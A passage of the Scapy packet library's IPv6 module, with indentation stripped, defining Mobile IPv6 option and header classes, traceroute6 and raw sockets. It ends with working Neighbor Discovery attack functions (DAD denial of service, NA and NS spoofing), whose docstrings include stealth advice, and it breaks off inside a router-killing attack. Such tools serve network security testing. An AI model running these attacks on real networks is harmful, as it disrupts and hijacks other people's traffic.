x = 0 ; y = 0 # alignment requirement: none
# We only support decoding and basic build. Automatic HMAC computation is
# too much work for our current needs. It is left to the user (I mean ...
# you). --arno
class MIP6OptMsgAuth(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 5)
name = "MIPv6 Option - Mobility Message Authentication"
fields_desc = [ ByteEnumField("otype", 9, _mobopttypes),
FieldLenField("olen", None, length_of="authdata", fmt="B",
adjust = lambda pkt,x: x+5),
ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option",
2: "MN-AAA authentication mobility option"}),
IntField("mspi", None),
StrLenField("authdata", "A"*12,
length_from = lambda pkt: pkt.olen-5) ]
x = 4 ; y = 1 # alignment requirement: 4n+1
# Extracted from RFC 1305 (NTP) :
# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
# in seconds relative to 0h on 1 January 1900. The integer part is in the
# first 32 bits and the fraction part in the last 32 bits.
class NTPTimestampField(LongField):
def i2repr(self, pkt, x):
if x < ((50*31536000)<<32):
return "Some date a few decades ago (%d)" % x
# delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
# January 1st 1970 :
delta = -2209075761
i = int(x >> 32)
j = float(x & 0xffffffff) * 2.0**-32
res = i + j + delta
from time import strftime
t = time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(res))
return "%s (%d)" % (t, x)
class MIP6OptReplayProtection(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 6)
name = "MIPv6 option - Replay Protection"
fields_desc = [ ByteEnumField("otype", 10, _mobopttypes),
ByteField("olen", 8),
NTPTimestampField("timestamp", 0) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.6)
name = "MIPv6 option - CGA Parameters Request"
fields_desc = [ ByteEnumField("otype", 11, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
# XXX TODO: deal with CGA param fragmentation and build of defragmented
# XXX version. Passing of a big CGAParam structure should be
# XXX simplified. Make it hold packets, by the way --arno
class MIP6OptCGAParams(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.1)
name = "MIPv6 option - CGA Parameters"
fields_desc = [ ByteEnumField("otype", 12, _mobopttypes),
FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
StrLenField("cgaparams", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptSignature(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.2)
name = "MIPv6 option - Signature"
fields_desc = [ ByteEnumField("otype", 13, _mobopttypes),
FieldLenField("olen", None, length_of="sig", fmt="B"),
StrLenField("sig", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.3)
name = "MIPv6 option - Home Keygen Token"
fields_desc = [ ByteEnumField("otype", 14, _mobopttypes),
FieldLenField("olen", None, length_of="hkt", fmt="B"),
StrLenField("hkt", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.4)
name = "MIPv6 option - Care-of Test Init"
fields_desc = [ ByteEnumField("otype", 15, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTest(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.5)
name = "MIPv6 option - Care-of Test"
fields_desc = [ ByteEnumField("otype", 16, _mobopttypes),
FieldLenField("olen", None, length_of="cokt", fmt="B"),
StrLenField("cokt", b'\x00'*8,
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptUnknown(_MIP6OptAlign, Packet):
name = 'Scapy6 - Unknown Mobility Option'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
FieldLenField("olen", None, length_of="odata", fmt="B"),
StrLenField("odata", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
moboptcls = { 0: Pad1,
1: PadN,
2: MIP6OptBRAdvice,
3: MIP6OptAltCoA,
4: MIP6OptNonceIndices,
5: MIP6OptBindingAuthData,
6: MIP6OptMobNetPrefix,
7: MIP6OptLLAddr,
8: MIP6OptMNID,
9: MIP6OptMsgAuth,
10: MIP6OptReplayProtection,
11: MIP6OptCGAParamsReq,
12: MIP6OptCGAParams,
13: MIP6OptSignature,
14: MIP6OptHomeKeygenToken,
15: MIP6OptCareOfTestInit,
16: MIP6OptCareOfTest }
# Main Mobile IPv6 Classes
mhtypes = { 0: 'BRR',
1: 'HoTI',
2: 'CoTI',
3: 'HoT',
4: 'CoT',
5: 'BU',
6: 'BA',
7: 'BE',
8: 'Fast BU',
9: 'Fast BA',
10: 'Fast NA' }
# From http://www.iana.org/assignments/mobility-parameters
bastatus = { 0: 'Binding Update accepted',
1: 'Accepted but prefix discovery necessary',
128: 'Reason unspecified',
129: 'Administratively prohibited',
130: 'Insufficient resources',
131: 'Home registration not supported',
132: 'Not home subnet',
133: 'Not home agent for this mobile node',
134: 'Duplicate Address Detection failed',
135: 'Sequence number out of window',
136: 'Expired home nonce index',
137: 'Expired care-of nonce index',
138: 'Expired nonces',
139: 'Registration type change disallowed',
140: 'Mobile Router Operation not permitted',
141: 'Invalid Prefix',
142: 'Not Authorized for Prefix',
143: 'Forwarding Setup failed (prefixes missing)',
144: 'MIPV6-ID-MISMATCH',
145: 'MIPV6-MESG-ID-REQD',
146: 'MIPV6-AUTH-FAIL',
147: 'Permanent home keygen token unavailable',
148: 'CGA and signature verification failed',
149: 'Permanent home keygen token exists',
150: 'Non-null home nonce index expected' }
class _MobilityHeader(Packet):
name = 'Dummy IPv6 Mobility Header'
overload_fields = { IPv6: { "nh": 135 }}
def post_build(self, p, pay):
p += pay
l = self.len
if self.len is None:
l = (len(p)-8)//8
p = p[0] + struct.pack("B", l) + p[2:]
if self.cksum is None:
cksum = in6_chksum(135, self.underlayer, p)
else:
cksum = self.cksum
p = chb(p[:4])+struct.pack("!H", cksum)+chb(p[6:])
return p
class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
name = "IPv6 Mobility Header - Generic Message"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", None, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrLenField("msg", b"\x00"*2,
length_from = lambda pkt: 8*pkt.len-6) ]
# TODO: make a generic _OptionsField
class _MobilityOptionsField(PacketListField):
__slots__ = ["curpos"]
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def getfield(self, pkt, s):
l = self.length_from(pkt)
return s[l:],self.m2i(pkt, s[:l])
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
def m2i(self, pkt, x):
opt = []
while x:
o = ord(x[0]) # Option type
cls = self.cls
if o in moboptcls:
cls = moboptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = b""
return opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return b"".join(map(str, x))
curpos = self.curpos
s = b""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += raw(Pad1())
elif d != 0:
s += raw(PadN(optdata=b'\x00'*(d-2)))
pstr = raw(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += raw(Pad1())
elif d != 0:
s += raw(PadN(optdata=b'\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class MIP6MH_BRR(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Refresh Request"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 0, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("res2", None),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 8,
length_from = lambda pkt: 8*pkt.len) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
# Hack: BRR, BU and BA have the same hashret that returns the same
# value b"\x00\x08\x09" (concatenation of mhtypes). This is
# because we need match BA with BU and BU with BRR. --arno
return b"\x00\x08\x09"
class MIP6MH_HoTI(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test Init"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 1, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrFixedLenField("reserved", b"\x00"*2, 2),
StrFixedLenField("cookie", b"\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 16,
length_from = lambda pkt: 8*(pkt.len-1)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return bytes(self.cookie)
class MIP6MH_CoTI(MIP6MH_HoTI):
name = "IPv6 Mobility Header - Care-of Test Init"
mhtype = 2
def hashret(self):
return self.cookie
class MIP6MH_HoT(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 3, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("index", None),
StrFixedLenField("cookie", b"\x00"*8, 8),
StrFixedLenField("token", b"\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return self.cookie
def answers(self, other):
if (isinstance(other, MIP6MH_HoTI) and
self.cookie == other.cookie):
return 1
return 0
class MIP6MH_CoT(MIP6MH_HoT):
name = "IPv6 Mobility Header - Care-of Test"
mhtype = 4
def hashret(self):
return self.cookie
def answers(self):
if (isinstance(other, MIP6MH_CoTI) and
self.cookie == other.cookie):
return 1
return 0
class LifetimeField(ShortField):
def i2repr(self, pkt, x):
return "%d sec" % (4*x)
class MIP6MH_BU(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Update"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 5, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
XShortField("seq", None), # TODO: ShortNonceField
FlagsField("flags", "KHA", 7, "PRMKLHA"),
XBitField("reserved", 0, 9),
LifetimeField("mhtime", 3), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len - 4) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return b"\x00\x08\x09"
def answers(self, other):
if isinstance(other, MIP6MH_BRR):
return 1
return 0
class MIP6MH_BA(_MobilityHeader):
name = "IPv6 Mobility Header - Binding ACK"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 6, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ByteEnumField("status", 0, bastatus),
FlagsField("flags", "K", 3, "PRK"),
XBitField("res2", None, 5),
XShortField("seq", None), # TODO: ShortNonceField
XShortField("mhtime", 0), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len-4) ]
overload_fields = { IPv6: { "nh": 135 }}
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return b"\x00\x08\x09"
def answers(self, other):
if (isinstance(other, MIP6MH_BU) and
other.mhtype == 5 and
self.mhtype == 6 and
other.flags & 0x1 and # Ack request flags is set
self.seq == other.seq):
return 1
return 0
_bestatus = { 1: 'Unknown binding for Home Address destination option',
2: 'Unrecognized MH Type value' }
# TODO: match Binding Error to its stimulus
class MIP6MH_BE(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Error"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 7, mhtypes),
ByteField("res", 0),
XShortField("cksum", None),
ByteEnumField("status", 0, _bestatus),
ByteField("reserved", 0),
IP6Field("ha", "::"),
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 }}
_mip6_mhtype2cls = { 0: MIP6MH_BRR,
1: MIP6MH_HoTI,
2: MIP6MH_CoTI,
3: MIP6MH_HoT,
4: MIP6MH_CoT,
5: MIP6MH_BU,
6: MIP6MH_BA,
7: MIP6MH_BE }
#############################################################################
#############################################################################
### Traceroute6 ###
#############################################################################
#############################################################################
class AS_resolver6(AS_resolver_riswhois):
def _resolve_one(self, ip):
"""
overloaded version to provide a Whois resolution on the
embedded IPv4 address if the address is 6to4 or Teredo.
Otherwise, the native IPv6 address is passed.
"""
if in6_isaddr6to4(ip): # for 6to4, use embedded @
tmp = inet_pton(socket.AF_INET6, ip)
addr = inet_ntop(socket.AF_INET, tmp[2:6])
elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
addr = teredoAddrExtractInfo(ip)[2]
else:
addr = ip
_, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
if asn.startswith(b"AS"):
try:
asn = int(asn[2:])
except ValueError:
pass
return ip,asn,desc
class TracerouteResult6(TracerouteResult):
__slots__ = []
def show(self):
return self.make_table(lambda s_r: (s_r[0].sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 !
s_r[0].hlim,
s_r[1].sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}"+
"{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"+
"{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"+
"{ICMPv6EchoReply:%ir,type%}")))
def get_trace(self):
trace = {}
for s,r in self.res:
if IPv6 not in s:
continue
d = s[IPv6].dst
if d not in trace:
trace[d] = {}
t = not (ICMPv6TimeExceeded in r or
ICMPv6DestUnreach in r or
ICMPv6PacketTooBig in r or
ICMPv6ParamProblem in r)
trace[d][s[IPv6].hlim] = r[IPv6].src, t
for k in six.itervalues(trace):
try:
m = min(x for x, y in six.itervalues(k) if y)
except ValueError:
continue
for l in k.keys(): # use .keys(): k is modified in the loop
if l > m:
del k[l]
return trace
def graph(self, ASres=AS_resolver6(), **kargs):
TracerouteResult.graph(self, ASres=ASres, **kargs)
@conf.commands.register
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
l4 = None, timeout=2, verbose=None, **kargs):
"""Instant TCP traceroute using IPv6
traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
"""
if verbose is None:
verbose = conf.verb
if l4 is None:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/TCP(seq=RandInt(),sport=sport, dport=dport),
timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs)
else:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/l4,
timeout=timeout, verbose=verbose, **kargs)
a = TracerouteResult6(a.res)
if verbose:
a.display()
return a,b
#############################################################################
#############################################################################
### Sockets ###
#############################################################################
#############################################################################
class L3RawSocket6(L3RawSocket):
def __init__(self, type = ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):
L3RawSocket.__init__(self, type, filter, iface, promisc)
# NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292)
self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
def IPv6inIP(dst='203.178.135.36', src=None):
_IPv6inIP.dst = dst
_IPv6inIP.src = src
if not conf.L3socket == _IPv6inIP:
_IPv6inIP.cls = conf.L3socket
else:
del(conf.L3socket)
return _IPv6inIP
class _IPv6inIP(SuperSocket):
dst = '127.0.0.1'
src = None
cls = None
def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):
SuperSocket.__init__(self, family, type, proto)
self.worker = self.cls(**args)
def set(self, dst, src=None):
_IPv6inIP.src = src
_IPv6inIP.dst = dst
def nonblock_recv(self):
p = self.worker.nonblock_recv()
return self._recv(p)
def recv(self, x):
p = self.worker.recv(x)
return self._recv(p, x)
def _recv(self, p, x=MTU):
if p is None:
return p
elif isinstance(p, IP):
# TODO: verify checksum
if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
if isinstance(p.payload, IPv6):
return p.payload
return p
def send(self, x):
return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)/x)
#############################################################################
#############################################################################
### Neighbor Discovery Protocol Attacks ###
#############################################################################
#############################################################################
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
tgt_filter=None, reply_mac=None):
"""
Internal generic helper accepting a specific callback as first argument,
for NS or NA reply. See the two specific functions below.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
# Get and compare the MAC address
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must be the unspecified address
if req[IPv6].src != "::":
return 0
# Check destination is the link-local solicited-node multicast
# address associated with target address in received NS
tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
received_snma = socket.inet_pton(socket.AF_INET6, req[IPv6].dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
return 0
return 1
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, iface),
iface=iface)
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3756. This is done by listening incoming NS messages sent from the
unspecified address and sending a NS reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NS sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the unspecified address (::).
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
"""
def ns_reply_callback(req, reply_mac, iface):
"""
Callback that reply to a NS by sending a similar NS
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac)/IPv6(src="::", dst=dst)/ICMPv6ND_NS(tgt=tgt)
sendp(rep, iface=iface, verbose=0)
print("Reply NS for target address %s (received from %s)" % (tgt, mac))
_NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3756. This is done by listening incoming NS messages *sent from the
unspecified address* and sending a NA reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address found in received NS.
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
"""
def na_reply_callback(req, reply_mac, iface):
"""
Callback that reply to a NS with a NA
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac)/IPv6(src=tgt, dst=dst)
rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1)
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print("Reply NA for target address %s (received from %s)" % (tgt, mac))
_NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None, router=False):
"""
The main purpose of this function is to send fake Neighbor Advertisement
messages to a victim. As the emission of unsolicited Neighbor Advertisement
is pretty pointless (from an attacker standpoint) because it will not
lead to a modification of a victim's neighbor cache, the function send
advertisements in response to received NS (NS sent as part of the DAD,
i.e. with an unspecified address as source, are not considered).
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address
- as IPv6 destination address: the source IPv6 address of received NS
message.
- the mac address of the interface as source (or reply_mac, see below).
- the source mac address of the received NS as destination macs address
of the emitted NA.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
filled with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
router: by the default (False) the 'R' flag in the NA used for the reply
is not set. If the parameter is set to True, the 'R' flag in the
NA is set, advertising us as a router.
Please, keep the following in mind when using the function: for obvious
reasons (kernel space vs. Python speed), when the target of the address
resolution is on the link, the sender of the NS receives 2 NA messages
in a row, the valid one and our fake one. The second one will overwrite
the information provided by the first one, i.e. the natural latency of
Scapy helps here.
In practice, on a common Ethernet link, the emission of the NA from the
genuine target (kernel stack) usually occurs in the same millisecond as
the receipt of the NS. The NA generated by Scapy6 will usually come after
something 20+ ms. On a usual testbed for instance, this difference is
sufficient to have the first data packet sent from the victim to the
destination before it even receives our fake NA.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must NOT be the unspecified address
if req[IPv6].src == "::":
return 0
tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
dst = req[IPv6].dst
if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
# If this is a real address resolution NS, then the destination
# address of the packet is the link-local solicited node multicast
# address associated with the target of the NS.
# Otherwise, the NS is a NUD related one, i.e. the peer is
# unicasting the NS to check the target is still alive (L2
# information is still in its cache and it is verified)
received_snma = socket.inet_pton(socket.AF_INET6, dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
print("solicited node multicast @ does not match target @!")
return 0
return 1
def reply_callback(req, reply_mac, router, iface):
"""
Callback that reply to a NS with a spoofed NA
"""
# Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
# send it back.
mac = req[Ether].src
pkt = req[IPv6]
src = pkt.src
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac, dst=mac)/IPv6(src=tgt, dst=src)
rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # target from the NS
# "If the solicitation IP Destination Address is not a multicast
# address, the Target Link-Layer Address option MAY be omitted"
# Given our purpose, we always include it.
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print("Reply NA for target address %s (received from %s)" % (tgt, mac))
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
router = (router and 1) or 0 # Value of the R flags in NA
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, router, iface),
iface=iface)
def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
dst=None, src_mac=None, dst_mac=None, loop=True,
inter=1, iface=None):
"""
The main purpose of this function is to send fake Neighbor Solicitations
messages to a victim, in order to either create a new entry in its neighbor
cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
that a node SHOULD create the entry or update an existing one (if it is not
currently performing DAD for the target of the NS). The entry's reachability
state is set to STALE.
The two main parameters of the function are the source link-layer address
(carried by the Source Link-Layer Address option in the NS) and the
source address of the packet.
Unlike some other NDP_Attack_* function, this one is not based on a
stimulus/response model. When called, it sends the same NS packet in loop
every second (the default)
Following arguments can be used to change the format of the packets:
src_lladdr: the MAC address used in the Source Link-Layer Address option
included in the NS packet. This is the address that the peer should
associate in its neighbor cache with the IPv6 source address of the
packet. If None is provided, the mac address of the interface is
used.
src: the IPv6 address used as source of the packet. If None is provided,
an address associated with the emitting interface will be used
(based on the destination address of the packet).
target: the target address of the NS packet. If no value is provided,
a dummy address (2001:db8::1) is used. The value of the target
has a direct impact on the destination address of the packet if it
is not overridden. By default, the solicited-node multicast address
associated with the target is used as destination address of the
packet. Consider specifying a specific destination address if you
intend to use a target address different than the one of the victim.
dst: The destination address of the NS. By default, the solicited node
multicast address associated with the target address (see previous
parameter) is used if no specific value is provided. The victim
is not expected to check the destination address of the packet,
so using a multicast address like ff02::1 should work if you want
the attack to target all hosts on the link. On the contrary, if
you want to be more stealth, you should provide the target address
for this parameter in order for the packet to be sent only to the
victim.
src_mac: the MAC address used as source of the packet. By default, this
is the address of the interface. If you want to be more stealth,
feel free to use something else. Note that this address is not the
that the victim will use to populate its neighbor cache.
dst_mac: The MAC address used as destination address of the packet. If
the IPv6 destination address is multicast (all-nodes, solicited
node, ...), it will be computed. If the destination address is
unicast, a neighbor solicitation will be performed to get the
associated address. If you want the attack to be stealth, you
can provide the MAC address using this parameter.
loop: By default, this parameter is True, indicating that NS packets
will be sent in loop, separated by 'inter' seconds (see below).
When set to False, a single packet is sent.
inter: When loop parameter is True (the default), this parameter provides
the interval in seconds used for sending NS packets.
iface: to force the sending interface.
"""
if not iface:
iface = conf.iface
# Use provided MAC address as source link-layer address option
# or the MAC address of the interface if none is provided.
if not src_lladdr:
src_lladdr = get_if_hwaddr(iface)
# Prepare packets parameters
ether_params = {}
if src_mac:
ether_params["src"] = src_mac
if dst_mac:
ether_params["dst"] = dst_mac
ipv6_params = {}
if src:
ipv6_params["src"] = src
if dst:
ipv6_params["dst"] = dst
else:
# Compute the solicited-node multicast address
# associated with the target address.
tmp = inet_ntop(socket.AF_INET6,
in6_getnsma(inet_pton(socket.AF_INET6, target)))
ipv6_params["dst"] = tmp
pkt = Ether(**ether_params)
pkt /= IPv6(**ipv6_params)
pkt /= ICMPv6ND_NS(tgt=target)
pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
ip_src_filter=None, reply_mac=None,
tgt_mac=None):
"""
The purpose of the function is to monitor incoming RA messages
sent by default routers (RA with a non-zero Router Lifetime values)
and invalidate them by immediately replying with fake RA messages
advertising a zero Router Lifetime value.
